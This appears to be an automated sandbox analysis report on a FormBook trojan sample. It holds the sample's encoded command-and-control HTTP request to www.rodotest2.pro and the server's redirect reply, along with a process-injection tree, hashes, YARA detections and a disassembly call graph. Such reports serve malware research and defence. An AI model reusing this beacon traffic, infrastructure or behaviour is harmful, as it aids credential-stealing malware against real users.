                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6e 67 46 30 66 61 5a 6a 56 4d 57 41 73 70 31 61 55 4a 47 53 45 43 4d 35 77 55 6b 39 37 56 61 57 36 77 74 66 64 56 31 4e 56 4c 4c 49 35 6d 55 4c 64 65 51 55 49 49 46 34 54 49 32 46 58 6a 59 52 2b 59 31 6e 66 66 32 47 79 74 54 35 76 4e 53 61 4b 74 65 54 71 73 74 32 59 35 52 4a 4e 39 55 31 31 4c 66 6e 6f 73 61 6d 4e 64 33 44 68 46 2f 43 4b 56 30 37 35 70 74 31 42 57 43 6f 74 49 5a 62 65 61 38 59 7a 32 78 75 73 50 57 37 78 32 76 6c 44 67 63 4c 2f 72 62 53 75 46 74 4c 37 30 54 2b 73 54 44 51 41 78 7a 71 34 32 36 45 66 45 4d 69 4d 42 70 46 61 4e 57 57 75 46 45 6a 33 66 52 61 69 69 68 74 6f 44 7a 55 7a 35 38 61 67 79 36 63 6c 63 65 6d 45 36 6c 4b 79 37 5a 4c 4a 52 6f 72 59 4a 43 41 34 63 36 6e 63 46 30 52 33 59 67 64 65 2b 74 4d 38 49 44 44 6e 73 58 61 41 6d 4c 31 41 4d 30 64 37 6a 35 4f 56 68 78 61 30 51 34 4d 75 4b 2b 53 65 30 70 6d 6c 4c 49 4c 2b 45 50 49 77 6e 31 57 62 6c 5a 4c 2f 63 79 46 71 66 44 47 53 37 78 79 71 59 70 58 33 52 78 74 39 30 72 2f 64 61 78 4c 54 62 77 64 76 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=ngF0faZjVMWAsp1aUJGSECM5wUk97VaW6wtfdV1NVLLI5mULdeQUIIF4TI2FXjYR+Y1nff2GytT5vNSaKteTqst2Y5RJN9U11LfnosamNd3DhF/CKV075pt1BWCotIZbea8Yz2xusPW7x2vlDgcL/rbSuFtL70T+sTDQAxzq426EfEMiMBpFaNWWuFEj3fRaiihtoDzUz58agy6clcemE6lKy7ZLJRorYJCA4c6ncF0R3Ygde+tM8IDDnsXaAmL1AM0d7j5OVhxa0Q4MuK+Se0pmlLIL+EPIwn1WblZL/cyFqfDGS7xyqYpX3Rxt90r/daxLTbwdvGu5LnFB++3EPcBKEJlTeXa93XSsj+qvckYJORTFG4gEYQAgIY9MZ4SKFHf/37pTktZh7lDqLvAmEH1E/ZTJ71e72Y+gZBW3dcCmPIgd9wdpwu4HqOITo+Wn7gnXdnhXeYKyIN/iJS1BZIQDejYQrJ0NQJvHwzzkSE6LwCI5AhFGQ59mng3vnMHN0dA+x5U8B+6UgylW6m4P83Fr8kGfkkUpx0MevYTsWxrDpUY36PBV6Rchmo2GYWgCFsYFRTo1aLLfOL8pkKXDJUxA+REL/1rI5pW/5rO9bxoB47z/9ixMUbELUe4MkWxcWQCUhlUPQiXLbFWAZ4O94hxJthPnAuReDeFkDnusCMMfRcwGo76t4RJ43FD8PHhUjf3ST4nQz2Ybe5n76Nrz18dqZaeo6LRQp3wJOPjQRphXOWb53oHNacFw/DCxkfNbHF2W1YZeTpvP0RUYn7fq6BxNDJLQ2iasK5JYvd3wkD2eNDnwqDYjcZLPHluSPLXZozYgTidle8Pu7RFzMjbRR8ABQKF1/YPoLwGNqQRRZWaapjJQZn3uDxAXVLINLgk4B/NQugi2TrrOSF6LZIuaYCASJi0q4NCjGo//mi3gKKc0VEkmlOch66sRqLRCMs/98GNRQbNn0GJPlLpN5V8nEAd9ej5I/i/PU5eVnApjJSA [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.4497893.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 16:00:05.324259043 CEST462OUTGET /50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 16:00:05.782807112 CEST400INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Wed, 03 Jul 2024 14:00:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 260
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 54 76 70 50 66 68 47 70 3d 71 69 74 55 63 71 55 66 66 50 32 79 6b 2b 4e 6c 54 63 6e 30 63 6e 6b 4f 79 57 51 66 7a 54 47 6f 7a 6a 45 2b 66 6b 52 2b 63 70 66 76 71 52 6f 52 51 65 30 4a 4a 70 59 74 65 5a 4f 31 65 6a 55 6a 38 5a 63 72 65 38 6a 76 36 2f 4b 56 2b 2f 43 78 4e 75 50 70 30 72 35 62 66 2b 55 49 65 2f 52 49 70 70 62 73 69 75 4f 4f 41 4f 7a 4c 68 7a 44 37 4f 48 63 4a 39 66 73 3d 26 59 36 36 34 47 3d 53 74 74 44 65 6e 39 38 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986"}</script></head></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:09:56:02
                                                          Start date:03/07/2024
                                                          Path:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
                                                          Imagebase:0x1a0000
                                                          File size:1'230'848 bytes
                                                          MD5 hash:CF27E45BE1B40DD336D102E1449046D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:09:56:03
                                                          Start date:03/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
                                                          Imagebase:0xc70000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:09:56:22
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe"
                                                          Imagebase:0xb40000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:09:56:23
                                                          Start date:03/07/2024
                                                          Path:C:\Windows\SysWOW64\subst.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\subst.exe"
                                                          Imagebase:0xa90000
                                                          File size:14'848 bytes
                                                          MD5 hash:0EAC8241D39176E0FA48B57C76C54742
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:09:56:36
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe"
                                                          Imagebase:0xb40000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:09:56:48
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0xb40000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:2.6%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:55
                                                            execution_graph 97688 1a568a 97695 1a5c18 97688->97695 97693 1a56ba Mailbox 97707 1c0ff6 97695->97707 97697 1a5c2b 97698 1c0ff6 Mailbox 59 API calls 97697->97698 97699 1a569c 97698->97699 97700 1a5632 97699->97700 97745 1a5a2f 97700->97745 97703 1a5674 97703->97693 97706 1a81c1 61 API calls Mailbox 97703->97706 97705 1a5643 97705->97703 97752 1a5d20 97705->97752 97758 1a5bda 59 API calls 2 library calls 97705->97758 97706->97693 97709 1c0ffe 97707->97709 97710 1c1018 97709->97710 97712 1c101c std::exception::exception 97709->97712 97717 1c594c 97709->97717 97734 1c35e1 DecodePointer 97709->97734 97710->97697 97735 1c87db RaiseException 97712->97735 97714 1c1046 97736 1c8711 58 API calls _free 97714->97736 97716 1c1058 97716->97697 97718 1c59c7 97717->97718 97725 1c5958 97717->97725 97743 1c35e1 DecodePointer 97718->97743 97720 1c59cd 97744 1c8d68 58 API calls __getptd_noexit 97720->97744 97723 1c598b RtlAllocateHeap 97723->97725 97733 1c59bf 97723->97733 97725->97723 97726 1c59b3 97725->97726 97727 1c5963 97725->97727 97731 1c59b1 97725->97731 97740 1c35e1 DecodePointer 97725->97740 97741 1c8d68 58 API calls __getptd_noexit 97726->97741 97727->97725 97737 1ca3ab 58 API calls __NMSG_WRITE 97727->97737 97738 1ca408 58 API calls 6 library calls 97727->97738 97739 1c32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97727->97739 97742 1c8d68 58 API calls __getptd_noexit 97731->97742 97733->97709 97734->97709 97735->97714 97736->97716 97737->97727 97738->97727 97740->97725 97741->97731 97742->97733 97743->97720 97744->97733 97746 1de065 97745->97746 97747 1a5a40 97745->97747 97759 1f6443 59 API calls Mailbox 97746->97759 97747->97705 97749 1de06f 97750 1c0ff6 Mailbox 59 API calls 97749->97750 97751 1de07b 97750->97751 97753 1a5d93 97752->97753 97756 1a5d2e 97752->97756 97760 1a5dae SetFilePointerEx 97753->97760 97755 1a5d56 97755->97705 97756->97755 97757 1a5d66 ReadFile 97756->97757 97757->97755 97757->97756 97758->97705 97759->97749 97760->97756 97761 1ae70b 97764 1ad260 97761->97764 97763 1ae719 97765 1ad27d 97764->97765 97792 1ad4dd 97764->97792 97766 1e2b0a 97765->97766 97767 1e2abb 97765->97767 97788 1ad2a4 97765->97788 97838 21a6fb 341 API calls __cinit 97766->97838 97770 1e2abe 97767->97770 97775 1e2ad9 97767->97775 97771 1e2aca 97770->97771 97770->97788 97836 21ad0f 341 API calls 97771->97836 97775->97792 97837 21b1b7 341 API calls 3 library calls 97775->97837 97776 1ad594 97827 1a8bb2 68 API calls 97776->97827 97777 1e2cdf 97777->97777 97778 1ad6ab 97778->97763 97782 1ad5a3 97782->97763 97783 1e2c26 97846 21aa66 89 API calls 97783->97846 97788->97776 97788->97778 97788->97783 97788->97792 97798 1aa000 97788->97798 97821 1a88a0 68 API calls __cinit 97788->97821 97822 1a86a2 68 API calls 97788->97822 97823 1a8620 97788->97823 97828 1a859a 68 API calls 97788->97828 97829 1ad0dc 341 API calls 97788->97829 97830 1a9f3a 59 API calls Mailbox 97788->97830 97831 1c2f80 97788->97831 97834 1ad060 89 API calls 97788->97834 97835 1acedd 341 API calls 97788->97835 97839 1a8bb2 68 API calls 97788->97839 97840 1a9e9c 60 API calls Mailbox 97788->97840 97841 1f6d03 60 API calls 97788->97841 97842 1a81a7 97788->97842 97792->97778 97847 20a0b5 89 API calls 4 library calls 97792->97847 97799 1aa01f 97798->97799 97816 1aa04d Mailbox 97798->97816 97800 1c0ff6 Mailbox 59 API calls 97799->97800 97800->97816 97801 1ab5d5 97802 1a81a7 59 API calls 97801->97802 97813 1aa1b7 97802->97813 97803 1a77c7 59 API calls 97803->97816 97804 1c0ff6 59 API calls Mailbox 97804->97816 97808 1e047f 97850 20a0b5 89 API calls 4 library calls 97808->97850 97810 1a81a7 59 API calls 97810->97816 97812 1e048e 97812->97788 97813->97788 97814 1c2f80 67 API calls __cinit 97814->97816 97815 1f7405 59 API calls 97815->97816 97816->97801 97816->97803 97816->97804 97816->97808 97816->97810 97816->97813 97816->97814 97816->97815 97817 1e0e00 97816->97817 97819 1aa6ba 97816->97819 97820 1ab5da 97816->97820 97848 1aca20 341 API calls 2 library calls 97816->97848 97849 1aba60 60 API calls Mailbox 97816->97849 97852 20a0b5 89 API calls 4 library calls 97817->97852 97851 20a0b5 89 API calls 4 library calls 97819->97851 97853 20a0b5 89 API calls 4 library calls 97820->97853 97821->97788 97822->97788 97824 1a862b 97823->97824 97826 1a8652 97824->97826 97854 1a8b13 69 API calls Mailbox 97824->97854 97826->97788 97827->97782 97828->97788 97829->97788 97830->97788 97855 1c2e84 97831->97855 97833 1c2f8b 97833->97788 97834->97788 97835->97788 97836->97778 97837->97792 97838->97788 97839->97788 97840->97788 97841->97788 97843 1a81ba 97842->97843 97844 1a81b2 97842->97844 97843->97788 97933 1a80d7 59 API calls 2 library calls 97844->97933 97846->97792 97847->97777 97848->97816 97849->97816 97850->97812 97851->97813 97852->97820 97853->97813 97854->97826 97856 1c2e90 __alloc_osfhnd 97855->97856 97863 1c3457 97856->97863 97862 1c2eb7 __alloc_osfhnd 97862->97833 97880 1c9e4b 97863->97880 97865 1c2e99 97866 1c2ec8 DecodePointer DecodePointer 97865->97866 97867 1c2ef5 97866->97867 97868 1c2ea5 97866->97868 97867->97868 97926 1c89e4 59 API calls __lseeki64 97867->97926 97877 1c2ec2 97868->97877 97870 1c2f58 EncodePointer EncodePointer 97870->97868 97871 1c2f07 97871->97870 97872 1c2f2c 97871->97872 97927 1c8aa4 61 API calls 2 library calls 97871->97927 97872->97868 97875 1c2f46 EncodePointer 97872->97875 97928 1c8aa4 61 API calls 2 library calls 97872->97928 97875->97870 97876 1c2f40 97876->97868 97876->97875 97929 1c3460 97877->97929 97881 1c9e5c 97880->97881 97882 1c9e6f EnterCriticalSection 97880->97882 97887 1c9ed3 97881->97887 97882->97865 97884 1c9e62 97884->97882 97911 1c32f5 58 API calls 3 library calls 97884->97911 97888 1c9edf __alloc_osfhnd 97887->97888 97889 1c9ee8 97888->97889 97890 1c9f00 97888->97890 97912 1ca3ab 58 API calls __NMSG_WRITE 97889->97912 97898 1c9f21 __alloc_osfhnd 97890->97898 97915 1c8a5d 58 API calls 2 library calls 97890->97915 97893 1c9eed 97913 1ca408 58 API calls 6 library calls 97893->97913 97894 1c9f15 97896 1c9f1c 97894->97896 97897 1c9f2b 97894->97897 97916 1c8d68 58 API calls __getptd_noexit 97896->97916 97901 1c9e4b __lock 58 API calls 97897->97901 97898->97884 97899 1c9ef4 97914 1c32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97899->97914 97903 1c9f32 97901->97903 97905 1c9f3f 97903->97905 97906 1c9f57 97903->97906 97917 1ca06b InitializeCriticalSectionAndSpinCount 97905->97917 97918 1c2f95 97906->97918 97909 1c9f4b 97924 1c9f73 LeaveCriticalSection _doexit 97909->97924 97912->97893 97913->97899 97915->97894 97916->97898 97917->97909 97919 1c2f9e RtlFreeHeap 97918->97919 97920 1c2fc7 _free 97918->97920 97919->97920 97921 1c2fb3 97919->97921 97920->97909 97925 1c8d68 58 API calls __getptd_noexit 97921->97925 97923 1c2fb9 GetLastError 97923->97920 97924->97898 97925->97923 97926->97871 97927->97872 97928->97876 97932 1c9fb5 LeaveCriticalSection 97929->97932 97931 1c2ec7 97931->97862 97932->97931 97933->97843 97934 1a107d 97939 1a71eb 97934->97939 97936 1a108c 97937 1c2f80 __cinit 67 API calls 97936->97937 97938 1a1096 97937->97938 97940 1a71fb __write_nolock 97939->97940 97970 1a77c7 97940->97970 97944 1a72ba 97982 1c074f 97944->97982 97951 1a77c7 59 API calls 97952 1a72eb 97951->97952 98001 1a7eec 97952->98001 97954 1a72f4 RegOpenKeyExW 97955 1decda RegQueryValueExW 97954->97955 97959 1a7316 Mailbox 97954->97959 97956 1ded6c RegCloseKey 97955->97956 97957 1decf7 97955->97957 97956->97959 97969 1ded7e _wcscat Mailbox __NMSG_WRITE 97956->97969 97958 1c0ff6 Mailbox 59 API calls 97957->97958 97960 1ded10 97958->97960 97959->97936 98005 1a538e 97960->98005 97963 1ded38 98008 1a7d2c 97963->98008 97964 1a7b52 59 API calls 97964->97969 97966 1ded52 97966->97956 97968 1a3f84 59 API calls 97968->97969 97969->97959 97969->97964 97969->97968 98017 1a7f41 97969->98017 97971 1c0ff6 Mailbox 59 API calls 97970->97971 97972 1a77e8 97971->97972 97973 1c0ff6 Mailbox 59 API calls 97972->97973 97974 1a72b1 97973->97974 97975 1a4864 97974->97975 98021 1d1b90 97975->98021 97978 1a7f41 59 API calls 97979 1a4897 97978->97979 98023 1a48ae 97979->98023 97981 1a48a1 Mailbox 97981->97944 97983 1d1b90 __write_nolock 97982->97983 97984 1c075c GetFullPathNameW 97983->97984 97985 1c077e 97984->97985 97986 1a7d2c 59 API calls 97985->97986 97987 1a72c5 97986->97987 97988 1a7e0b 97987->97988 97989 1a7e1f 97988->97989 97990 1df173 97988->97990 98045 1a7db0 97989->98045 98050 1a8189 97990->98050 97993 1a72d3 97995 1a3f84 97993->97995 97994 1df17e __NMSG_WRITE _memmove 97996 1a3f92 97995->97996 98000 1a3fb4 _memmove 97995->98000 97998 1c0ff6 Mailbox 59 API calls 97996->97998 97997 1c0ff6 Mailbox 59 API calls 97999 1a3fc8 97997->97999 97998->98000 97999->97951 98000->97997 98002 1a7ef9 98001->98002 98003 1a7f06 98001->98003 98002->97954 98004 1c0ff6 Mailbox 59 API calls 98003->98004 98004->98002 98006 1c0ff6 Mailbox 59 API calls 98005->98006 98007 1a53a0 RegQueryValueExW 98006->98007 98007->97963 98007->97966 98009 1a7d38 __NMSG_WRITE 98008->98009 98010 1a7da5 98008->98010 98012 1a7d4e 98009->98012 98013 1a7d73 98009->98013 98011 1a7e8c 59 API calls 98010->98011 98016 1a7d56 _memmove 98011->98016 98053 1a8087 98012->98053 98014 1a8189 59 API calls 98013->98014 98014->98016 98016->97966 98018 1a7f50 __NMSG_WRITE _memmove 98017->98018 98019 1c0ff6 Mailbox 59 API calls 98018->98019 98020 1a7f8e 98019->98020 98020->97969 98022 1a4871 GetModuleFileNameW 98021->98022 98022->97978 98024 1d1b90 __write_nolock 98023->98024 98025 1a48bb GetFullPathNameW 98024->98025 98026 1a48da 98025->98026 98027 1a48f7 98025->98027 98029 1a7d2c 59 API calls 98026->98029 98028 1a7eec 59 API calls 98027->98028 98030 1a48e6 98028->98030 98029->98030 98033 1a7886 98030->98033 98034 1a7894 98033->98034 98037 1a7e8c 98034->98037 98036 1a48f2 98036->97981 98038 1a7e9a 98037->98038 98040 1a7ea3 _memmove 98037->98040 98038->98040 98041 1a7faf 98038->98041 98040->98036 98042 1a7fc2 98041->98042 98044 1a7fbf _memmove 98041->98044 98043 1c0ff6 Mailbox 59 API calls 98042->98043 98043->98044 98044->98040 98046 1a7dbf __NMSG_WRITE 98045->98046 98047 1a8189 59 API calls 98046->98047 98048 1a7dd0 _memmove 98046->98048 98049 1df130 _memmove 98047->98049 98048->97993 98051 1c0ff6 Mailbox 59 API calls 98050->98051 98052 1a8193 98051->98052 98052->97994 98054 1a809f 98053->98054 98056 1a8099 98053->98056 98055 1c0ff6 Mailbox 59 API calls 98054->98055 98055->98056 98056->98016 98057 1e0226 98063 1aade2 Mailbox 98057->98063 98059 1e0c86 98227 1f66f4 98059->98227 98061 1e0c8f 98063->98059 98063->98061 98064 1e00e0 VariantClear 98063->98064 98065 1ab6c1 98063->98065 98073 20d2e5 98063->98073 98120 20d2e6 98063->98120 98167 21474d 98063->98167 98176 21e237 98063->98176 98179 22251d 98063->98179 98184 1b2123 98063->98184 98224 1a9df0 59 API calls Mailbox 98063->98224 98225 1f7405 59 API calls 98063->98225 98064->98063 98226 20a0b5 89 API calls 4 library calls 98065->98226 98074 20d305 98073->98074 98075 20d310 98073->98075 98261 1a9c9c 59 API calls 98074->98261 98078 1a77c7 59 API calls 98075->98078 98118 20d3ea Mailbox 98075->98118 98077 1c0ff6 Mailbox 59 API calls 98079 20d433 98077->98079 98080 20d334 98078->98080 98081 20d43f 98079->98081 98327 1a5906 60 API calls Mailbox 98079->98327 98082 1a77c7 59 API calls 98080->98082 98230 1a9997 98081->98230 98084 20d33d 98082->98084 98086 1a9997 84 API calls 98084->98086 98088 20d349 98086->98088 98262 1a46f9 98088->98262 98092 20d35e 98313 1a7c8e 98092->98313 98093 20d46a GetLastError 98097 20d483 98093->98097 98095 20d500 98098 1c0ff6 Mailbox 59 API calls 98095->98098 98096 20d4c9 98100 1c0ff6 Mailbox 59 API calls 98096->98100 98115 20d3f3 Mailbox 98097->98115 98328 1a5a1a CloseHandle 98097->98328 98103 20d505 98098->98103 98099 20d49e 98099->98095 98099->98096 98105 20d4ce 98100->98105 98101 20d3e3 98326 1a9c9c 59 API calls 98101->98326 98110 1a77c7 59 API calls 98103->98110 98103->98115 98108 20d4df 98105->98108 98111 1a77c7 59 API calls 98105->98111 98329 20f835 59 API calls 2 library calls 98108->98329 98110->98115 98111->98108 98112 20d3a5 98114 1a7f41 59 API calls 98112->98114 98116 20d3b2 98114->98116 98115->98063 98325 203c66 63 API calls Mailbox 98116->98325 98118->98077 98118->98115 98119 20d3bb Mailbox 98119->98101 98121 20d305 98120->98121 98122 20d310 98120->98122 98406 1a9c9c 59 API calls 98121->98406 98125 1a77c7 59 API calls 98122->98125 98165 20d3ea Mailbox 98122->98165 98124 1c0ff6 Mailbox 59 API calls 98126 20d433 98124->98126 98127 20d334 98125->98127 98128 20d43f 98126->98128 98409 1a5906 60 API calls Mailbox 98126->98409 98129 1a77c7 59 API calls 98127->98129 98132 1a9997 84 API calls 98128->98132 98131 20d33d 98129->98131 98133 1a9997 84 API calls 98131->98133 98134 20d457 98132->98134 98135 20d349 98133->98135 98136 1a5956 67 API calls 98134->98136 98137 1a46f9 59 API calls 98135->98137 98138 20d466 98136->98138 98139 20d35e 98137->98139 98140 20d46a GetLastError 98138->98140 98141 20d49e 98138->98141 98142 1a7c8e 59 API calls 98139->98142 98143 20d483 98140->98143 98144 20d500 98141->98144 98145 20d4c9 98141->98145 98146 20d391 98142->98146 98150 20d3f3 Mailbox 98143->98150 98410 1a5a1a CloseHandle 98143->98410 98147 1c0ff6 Mailbox 59 API calls 98144->98147 98148 1c0ff6 Mailbox 59 API calls 98145->98148 98149 20d3e3 98146->98149 98154 203e73 3 API calls 98146->98154 98151 20d505 98147->98151 98153 20d4ce 98148->98153 98408 1a9c9c 59 API calls 98149->98408 98150->98063 98151->98150 98157 1a77c7 59 API calls 98151->98157 98158 1a77c7 59 API calls 98153->98158 98161 20d4df 98153->98161 98156 20d3a1 98154->98156 98156->98149 98159 20d3a5 98156->98159 98157->98150 98158->98161 98162 1a7f41 59 API calls 98159->98162 98411 20f835 59 API calls 2 library calls 98161->98411 98163 20d3b2 98162->98163 98407 203c66 63 API calls Mailbox 98163->98407 98165->98124 98165->98150 98166 20d3bb Mailbox 98166->98149 98168 1a9997 84 API calls 98167->98168 98169 214787 98168->98169 98412 1a63a0 98169->98412 98171 2147bc 98175 2147c0 98171->98175 98438 1a9bf8 98171->98438 98172 214797 98172->98171 98173 1aa000 341 API calls 98172->98173 98173->98171 98175->98063 98470 21cdf1 98176->98470 98178 21e247 98178->98063 98581 1ff8f2 98179->98581 98181 222529 98600 1a9b9c 59 API calls Mailbox 98181->98600 98183 222545 Mailbox 98183->98063 98185 1a9bf8 59 API calls 98184->98185 98186 1b213b 98185->98186 98188 1c0ff6 Mailbox 59 API calls 98186->98188 98190 1e69af 98186->98190 98189 1b2154 98188->98189 98192 1b2164 98189->98192 98617 1a5906 60 API calls Mailbox 98189->98617 98191 1b2189 98190->98191 98621 20f7df 59 API calls 98190->98621 98200 1b2196 98191->98200 98622 1a9c9c 59 API calls 98191->98622 98194 1a9997 84 API calls 98192->98194 98195 1b2172 98194->98195 98197 1a5956 67 API calls 98195->98197 98201 1b2181 98197->98201 98198 1e69f7 98199 1e69ff 98198->98199 98198->98200 98623 1a9c9c 59 API calls 98199->98623 98203 1a5e3f 2 API calls 98200->98203 98201->98190 98201->98191 98620 1a5a1a CloseHandle 98201->98620 98205 1b219d 98203->98205 98206 1b21b7 98205->98206 98207 1e6a11 98205->98207 98209 1a77c7 59 API calls 98206->98209 98208 1c0ff6 Mailbox 59 API calls 98207->98208 98211 1e6a17 98208->98211 98210 1b21bf 98209->98210 98602 1a56d2 98210->98602 98213 1e6a2b 98211->98213 98624 